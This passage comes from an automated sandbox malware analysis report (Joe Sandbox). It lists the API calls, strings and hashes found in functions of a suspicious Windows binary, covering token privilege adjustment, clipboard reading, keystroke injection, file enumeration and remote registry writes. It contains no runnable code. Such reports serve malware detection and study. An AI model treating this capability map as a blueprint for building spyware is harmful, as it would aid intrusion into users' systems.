                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB2A
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB33
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB38
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB42
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB47
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DB4A
                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0049DB71
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                                                                                            • Opcode ID: 51955a676c3d1ebc6369651e989be014844f94a095b71c7fc7d9ac7197934d9f
                                                                                                                                                                            • Instruction ID: e0a8808433ff5e44dc6bb65cd115e220310fc68b68ff3c6cc82b49b05fa81eae
                                                                                                                                                                            • Opcode Fuzzy Hash: 51955a676c3d1ebc6369651e989be014844f94a095b71c7fc7d9ac7197934d9f
                                                                                                                                                                            • Instruction Fuzzy Hash: A1318471E40358BBEF205FA19C89F7F3E6CEB44B50F114036FA04AA1D2C6745D01ABA9
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
                                                                                                                                                                              • Part of subcall function 004B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
                                                                                                                                                                              • Part of subcall function 004B8CC3: GetLastError.KERNEL32 ref: 004B8D47
                                                                                                                                                                            • _memset.LIBCMT ref: 004B889B
                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004B88ED
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004B88FE
                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004B8915
                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 004B892E
                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004B8938
                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004B8952
                                                                                                                                                                              • Part of subcall function 004B8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B8851), ref: 004B8728
                                                                                                                                                                              • Part of subcall function 004B8713: CloseHandle.KERNEL32(?,?,004B8851), ref: 004B873A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                            • API String ID: 2063423040-1027155976
                                                                                                                                                                            • Opcode ID: 07c1fa08b7b1a8b2ba5efee8ddef0586f891a0f33cedd4cf610eea8875f10796
                                                                                                                                                                            • Instruction ID: f546c2d0a750ad8eee12fa9421c1d3368994a7389ede8a826de4e54e26427e14
                                                                                                                                                                            • Opcode Fuzzy Hash: 07c1fa08b7b1a8b2ba5efee8ddef0586f891a0f33cedd4cf610eea8875f10796
                                                                                                                                                                            • Instruction Fuzzy Hash: E6812A71900249AFDF11DFA4DC45AEEBBBDAF08304F18416EF910A6261DB398E15DB78
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenClipboard.USER32(004EF910), ref: 004D4284
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 004D4292
                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 004D429A
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D42A6
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004D42C2
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D42CC
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004D42E1
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 004D42EE
                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 004D42F6
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004D4303
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004D4337
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D4447
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3222323430-0
                                                                                                                                                                            • Opcode ID: f2b230849bad8f048e68577d8643e151a4828a2ba3b975cd7a5b55f3973c028d
                                                                                                                                                                            • Instruction ID: 2cd97f2121398f119dfa29e6be8ba88c09709b0769e2e73818c9e96a628e5a72
                                                                                                                                                                            • Opcode Fuzzy Hash: f2b230849bad8f048e68577d8643e151a4828a2ba3b975cd7a5b55f3973c028d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7151C135204241ABD701EF61DC96F6F77A8AF84B04F00453FF545D62A2EB78D9098B6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004CC9F8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CCA4C
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004CCA71
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004CCA88
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 004CCAAF
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCAFB
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCB3E
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCB92
                                                                                                                                                                              • Part of subcall function 004838D8: __woutput_l.LIBCMT ref: 00483931
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCBE0
                                                                                                                                                                              • Part of subcall function 004838D8: __flsbuf.LIBCMT ref: 00483953
                                                                                                                                                                              • Part of subcall function 004838D8: __flsbuf.LIBCMT ref: 0048396B
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCC2F
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCC7E
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCCCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                            • API String ID: 3953360268-2428617273
                                                                                                                                                                            • Opcode ID: fad89159de70a2eb07f5f481904a035808f2a48015e756cecc6a1d0e0eeb8730
                                                                                                                                                                            • Instruction ID: 9b4dee882f5d59ab36e0c043f3a3867ac4bf6c887dfdf24d0c106c7e638877ae
                                                                                                                                                                            • Opcode Fuzzy Hash: fad89159de70a2eb07f5f481904a035808f2a48015e756cecc6a1d0e0eeb8730
                                                                                                                                                                            • Instruction Fuzzy Hash: D6A12FB1508344ABC704EF95C895DAFB7ECAF94704F40492EF58587192FA78DA08C767
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004CF221
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF236
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF24D
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 004CF25F
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 004CF279
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004CF291
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF29C
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 004CF2B8
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF2DF
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF2F6
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004CF308
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0051A5A0), ref: 004CF326
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004CF330
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF33D
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF34F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1803514871-438819550
                                                                                                                                                                            • Opcode ID: 36a13e2b035ee44260600499ad4021bc1557f87695c536c05601ba39416cdedc
                                                                                                                                                                            • Instruction ID: 334ff999e0d9361d7be569f4d9b7424c6e55eaca0c05abdfb03c54ffc286fa19
                                                                                                                                                                            • Opcode Fuzzy Hash: 36a13e2b035ee44260600499ad4021bc1557f87695c536c05601ba39416cdedc
                                                                                                                                                                            • Instruction Fuzzy Hash: A031C47A5012496ADB50DBB0DC88FDE77ADAF48361F1041BAED00D31A1EB39DA498A58
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0BDE
                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,004EF910,00000000,?,00000000,?,?), ref: 004E0C4C
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004E0C94
                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004E0D1D
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004E103D
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E104A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                            • API String ID: 536824911-966354055
                                                                                                                                                                            • Opcode ID: b74c3b26f112ee47c26c5edb7efda0f7f8286d500a3b8f36aed098e40b1b3905
                                                                                                                                                                            • Instruction ID: 0364f1fef5fc2ad762c244b4095287674be5cf87c41e3a562219396e0a5029a6
                                                                                                                                                                            • Opcode Fuzzy Hash: b74c3b26f112ee47c26c5edb7efda0f7f8286d500a3b8f36aed098e40b1b3905
                                                                                                                                                                            • Instruction Fuzzy Hash: D202A2752006419FCB14EF16C891E2AB7E5FF88714F04885EF8999B362DB78EC45CB4A
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004CF37E
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF393
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF3AA
                                                                                                                                                                              • Part of subcall function 004C45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004C45DC
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004CF3D9
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF3E4
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 004CF400
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF427
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF43E
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004CF450
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0051A5A0), ref: 004CF46E
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004CF478
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF485
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF497
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1824444939-438819550
                                                                                                                                                                            • Opcode ID: d0ecee2f41787ddd1a0c650d835f9f58904ab970f0b545fa2ca3cc98c1450a69
                                                                                                                                                                            • Instruction ID: 2a7c90cb63b616b1702b4fc090c4818281bdae08e1612c36a97e9ead7d1d07a8
                                                                                                                                                                            • Opcode Fuzzy Hash: d0ecee2f41787ddd1a0c650d835f9f58904ab970f0b545fa2ca3cc98c1450a69
                                                                                                                                                                            • Instruction Fuzzy Hash: 4831B3765012596ADB14ABA4EC88FDF77AD9F49325F1041BBE800E21A1D73CDA48CA5C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -es$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$OaG$PJP$UCP)$UTF)$UTF16)
                                                                                                                                                                            • API String ID: 0-3192530332
                                                                                                                                                                            • Opcode ID: 0e2acf74521e88d2206186013651f1ec47cfed3d1c417cb6d07c824ab9494661
                                                                                                                                                                            • Instruction ID: 085cabe1337b6822ec943b3baa25c4d2857e86564ec5398e686033f752d39038
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e2acf74521e88d2206186013651f1ec47cfed3d1c417cb6d07c824ab9494661
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F728F71E006199BDB24CF59C8907EEB7B6FF48310F55816BE809EB390DB389981CB95
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
                                                                                                                                                                              • Part of subcall function 004B874A: GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
                                                                                                                                                                              • Part of subcall function 004B874A: GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
                                                                                                                                                                              • Part of subcall function 004B874A: HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
                                                                                                                                                                              • Part of subcall function 004B87E7: GetProcessHeap.KERNEL32(00000008,004B8240,00000000,00000000,?,004B8240,?), ref: 004B87F3
                                                                                                                                                                              • Part of subcall function 004B87E7: HeapAlloc.KERNEL32(00000000,?,004B8240,?), ref: 004B87FA
                                                                                                                                                                              • Part of subcall function 004B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004B8240,?), ref: 004B880B
                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B825B
                                                                                                                                                                            • _memset.LIBCMT ref: 004B8270
                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B828F
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B82A0
                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004B82DD
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B82F9
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B8316
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004B8325
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B832C
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B834D
                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 004B8354
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B8385
                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B83AB
                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B83BF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3996160137-0
                                                                                                                                                                            • Opcode ID: 067a702130de00b35f7a6511ed5dd57f9c3878690be50111b4a0da347d97c2d7
                                                                                                                                                                            • Instruction ID: cf18b75ca681f30aafcd9f70ec9b4d50ec012698af4d7af51cb8a1f70fae0090
                                                                                                                                                                            • Opcode Fuzzy Hash: 067a702130de00b35f7a6511ed5dd57f9c3878690be50111b4a0da347d97c2d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 87615871900209ABDF00DFA5DC85AEEBBB9FF04704F14816EE815AA291DB399A15CF64
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0737
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004E07D6
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004E086E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004E0AAD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0ABA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1240663315-0
                                                                                                                                                                            • Opcode ID: 1ec5eee8dec6102502afedc4b9f7dd3476c5b49f5adb34d6c24be57bf154c864
                                                                                                                                                                            • Instruction ID: c8eae5a791f6b1db4b832aa4454a0be59ca7789fd934727117bbbca438e68050
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ec5eee8dec6102502afedc4b9f7dd3476c5b49f5adb34d6c24be57bf154c864
                                                                                                                                                                            • Instruction Fuzzy Hash: 59E17F71204340AFCB14DF26C880E6BBBE8EF89714F04896EF459DB262DA74ED45CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C0241
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 004C02C2
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 004C02DD
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004C02F7
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 004C030C
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004C0324
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 004C0336
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 004C034E
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 004C0360
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 004C0378
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 004C038A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
